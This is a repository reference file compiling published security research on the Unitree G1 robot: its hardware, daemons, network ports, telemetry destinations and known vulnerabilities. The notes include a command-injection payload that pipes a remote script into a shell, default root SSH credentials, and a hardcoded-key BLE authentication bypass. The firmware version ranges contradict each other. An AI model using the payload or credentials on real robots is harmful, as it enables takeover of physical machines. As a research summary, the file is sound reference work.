epilectrik
/
unitree-g1
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
5 Commits
1 Branch
0 Tags
327 KiB
 
 
Tree: 5f0fe3a747
Branches Tags
${ item.name }
Create tag ${ searchTerm }
Create branch ${ searchTerm }
from '5f0fe3a747'
${ noResults }
unitree-g1/reference/sources/paper-cybersecurity-detaile...

2.6 KiB
Raw Blame History

Cybersecurity of the Unitree G1 — Detailed Findings

Sources: arXiv:2509.14096, arXiv:2509.14139, UniPwn (GitHub: Bin4ry/UniPwn), FreeBOT (theroboverse.com) Fetched: 2026-02-13 Type: Security Research — Aggregated Findings

Locomotion Computer Hardware

  • Processor: Rockchip RK3588 (8-core ARM Cortex-A76/A55)
  • RAM: 8GB LPDDR4X
  • Storage: 32GB eMMC
  • Kernel: Linux 5.10.176-rt86+ (real-time patched)
  • Network: eth0 at 192.168.123.161/24, wlan0 at 192.168.8.193/24

Software Architecture

  • master_service orchestrator (9.2 MB binary) supervises 26 daemons
  • ai_sport — primary locomotion/balance policy (145% CPU, 135 MB RAM)
  • state_estimator — sensor fusion (~30% CPU)
  • motion_switcher — gait mode management
  • robot_state_service, dex3_service_l/r, webrtc_bridge, ros_bridge
  • Configuration files encrypted with FMX format: Blowfish-ECB + LCG stream cipher with static keys (partially reverse-engineered)
  • Unix socket: /unitree/var/run/master_service.sock

Known Vulnerabilities

UniPwn BLE Exploit (Bin4ry, Sep 2025)

  • Affects: G1, H1, R1, Go2, B2
  • Hardcoded AES encryption keys identical across ALL Unitree robots
  • Authentication: encrypt string "unitree" with known key → passes
  • SSID/password fields passed to system() with root privileges
  • Wormable: infected robot can scan BLE and compromise other Unitree robots
  • GitHub: Bin4ry/UniPwn

FreeBOT Jailbreak (TheRoboVerse)

  • Command injection via WiFi password field in mobile app
  • Payload: ;curl -L 4jb.me|sh;#
  • Works on firmware 1.3.0-1.6.0
  • SSH after jailbreak: root:theroboverse
  • Patched in firmware 1.1.8+ (October 2025)

Known CVEs on RK3588

  • CVE-2023-52660, CVE-2025-38081, CVE-2024-57256

Telemetry (Data Exfiltration)

  • Robot phones home every ~5 minutes via MQTT (port 17883)
  • Data sent: audio, video, LiDAR, GPS, robot state
  • Destination IPs: 43.175.228.18, 43.175.229.18, 8.222.78.102
  • Mitigation: block outbound at network firewall, or isolate robot network from internet

Open Services on 192.168.123.161

  • DDS/Iceoryx: UDP 7400
  • WebRTC signal server: port 8081
  • MQTT: port 17883 (outbound to telemetry servers)

Key Conclusion

Root access to the RK3588 is achievable via BLE exploits. However, nobody has publicly documented replacing ai_sport (the stock locomotion policy) with a custom binary, or extracting the RL policy weights from it. The FMX-encrypted configuration files and the master_service orchestrator remain barriers. All research groups deploy custom policies from external computers via DDS.